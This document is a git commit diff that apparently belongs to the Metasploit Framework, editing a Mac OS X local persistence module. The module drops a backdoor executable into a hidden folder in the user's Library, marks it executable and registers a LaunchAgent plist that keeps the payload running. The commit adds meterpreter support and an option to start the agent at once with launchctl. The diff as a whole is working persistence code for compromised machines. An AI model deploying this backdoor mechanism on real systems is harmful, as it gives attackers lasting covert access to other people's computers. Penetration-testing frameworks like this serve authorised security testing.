Remove unnecessary Exe::Custom logic.
- this is handled by the exe.rb mixin. - adds support for a RUN_NOW datastore option. - tested working on java meterpreter and x86 shell session.bug/bundler_fix
joev
parent
ea9235c506
commit
a2e3c6244e
|
|
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'Platform' => [ 'osx' ],
|
||||
'Targets' => [ [ 'Mac OS X', {} ] ],
|
||||
'DefaultTarget' => 0,
|
||||
'SessionTypes' => [ 'shell' ]
|
||||
'SessionTypes' => [ 'shell', 'meterpreter' ]
|
||||
))
|
||||
|
||||
register_options([
|
||||
|
|
@ -40,14 +40,11 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
[true, 'Path to hide the backdoor on the target.',
|
||||
'/Users/<user>/Library/.<random>/com.system.update']
|
||||
),
|
||||
OptBool.new('KEEPALIVE',
|
||||
OptBool.new('KEEPALIVE',
|
||||
[true, 'Continually restart the payload exe if it crashes/exits.', true]
|
||||
)
|
||||
], self.class)
|
||||
|
||||
register_advanced_options([
|
||||
OptPath.new('EXE::Custom',
|
||||
[false, 'Use custom exe instead of automatically generating a payload exe']
|
||||
),
|
||||
OptBool.new('RUN_NOW',
|
||||
[false, 'Run the installed payload immediately.', false]
|
||||
)
|
||||
], self.class)
|
||||
end
|
||||
|
|
@ -57,40 +54,23 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
write_backdoor(generate_payload_exe)
|
||||
# Add plist file to LaunchAgents dir
|
||||
add_launchctl_item
|
||||
# invoke the service if necessary
|
||||
invoke_service if run_now?
|
||||
# tell the user how to remove the persistence if necessary
|
||||
list_removal_paths
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
# @return [String] an exe containing our payload
|
||||
def generate_payload_exe
|
||||
if datastore.include? 'EXE::Custom'
|
||||
get_custom_exe
|
||||
else
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
# used when user has specified EXE::Custom datastore advanced option
|
||||
# @return [String] custom exe file, from path specified in EXE::Custom
|
||||
def get_custom_exe
|
||||
custom_path = datastore['EXE::Custom']
|
||||
print_status("Using custom payload #{path}, other payload settings will be ignored!")
|
||||
datastore['DisablePayloadHandler'] = true
|
||||
File.read(custom_path)
|
||||
end
|
||||
|
||||
# drops the file to disk, then makes it executable
|
||||
# @param [String] exe the executable to drop
|
||||
def write_backdoor(exe)
|
||||
print_status("Dropping backdoor executable...")
|
||||
cmd_exec("mkdir -p", File.dirname(backdoor_path))
|
||||
cmd_exec("mkdir -p #{File.dirname(backdoor_path).shellescape}")
|
||||
|
||||
if write_file(backdoor_path, exe)
|
||||
print_good("Backdoor stored to #{backdoor_path}")
|
||||
cmd_exec("chmod +x", backdoor_path)
|
||||
# TODO: for java/python/php meterpreter payloads, this won't work.
|
||||
# we could add some logic for dropping jar/py/php, then dropping a
|
||||
# bash script that invokes java -jar or python or whatever.
|
||||
cmd_exec("chmod +x #{backdoor_path.shellescape}")
|
||||
else
|
||||
fail_with("Error dropping backdoor to #{backdoor_path}")
|
||||
end
|
||||
|
|
@ -99,12 +79,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# drops a LaunchAgent plist into the user's Library, which specifies to run backdoor_path
|
||||
def add_launchctl_item
|
||||
label = File.basename(backdoor_path)
|
||||
plist_file = label + ".plist"
|
||||
plist_path = "/Users/#{user}/Library/LaunchAgents/"
|
||||
# just in case...
|
||||
cmd_exec("mkdir -p", plist_path)
|
||||
# build the plist
|
||||
plist_path = plist_path + plist_file
|
||||
item = <<-EOI
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||||
|
|
@ -126,13 +101,29 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
</plist>
|
||||
EOI
|
||||
|
||||
if write_file(plist_path,item)
|
||||
if write_file(plist_path, item)
|
||||
print_good("LaunchAgent added: #{plist_path}")
|
||||
else
|
||||
fail_with("Error writing LaunchAgent item to #{plist_path}")
|
||||
end
|
||||
end
|
||||
|
||||
# tells launchctl to start the service we dropped
|
||||
def invoke_service
|
||||
print_status("Starting the LaunchAgent")
|
||||
cmd_exec("launchctl unload -w #{plist_path.shellescape}") # in case of previous persistence (unlikely)
|
||||
cmd_exec("launchctl load -w #{plist_path.shellescape}")
|
||||
cmd_exec("launchctl start #{File.basename(plist_path)}")
|
||||
end
|
||||
|
||||
# useful if you want to remove the persistence.
|
||||
# prints out a list of paths to remove and commands to run.
|
||||
def list_removal_paths
|
||||
files = [backdoor_path, plist_path]
|
||||
run_cmd = "Then log out or run: launchctl unload -w #{plist_path.shellescape}"
|
||||
print_status("To remove the persistence, delete the files:\n#{files.join("\n")}\n#{run_cmd}")
|
||||
end
|
||||
|
||||
# path to upload the backdoor. any <user> or <random> substrings will be replaced.
|
||||
# @return [String] path to drop the backdoor payload.
|
||||
def backdoor_path
|
||||
|
|
@ -141,7 +132,14 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
.gsub('<user>', user))
|
||||
end
|
||||
|
||||
# path to the LaunchAgent service configuration plist
|
||||
# @return [String] path to the LaunchAgent service
|
||||
def plist_path
|
||||
@plist ||= "/Users/#{user}/Library/LaunchAgents/#{File.basename(backdoor_path)}.plist"
|
||||
end
|
||||
|
||||
def keepalive?; datastore['KEEPALIVE']; end
|
||||
def run_now?; datastore['RUN_NOW']; end
|
||||
|
||||
# @return [String] username of the session
|
||||
def user
|
||||
|
|
|
|||
Loading…
Reference in New Issue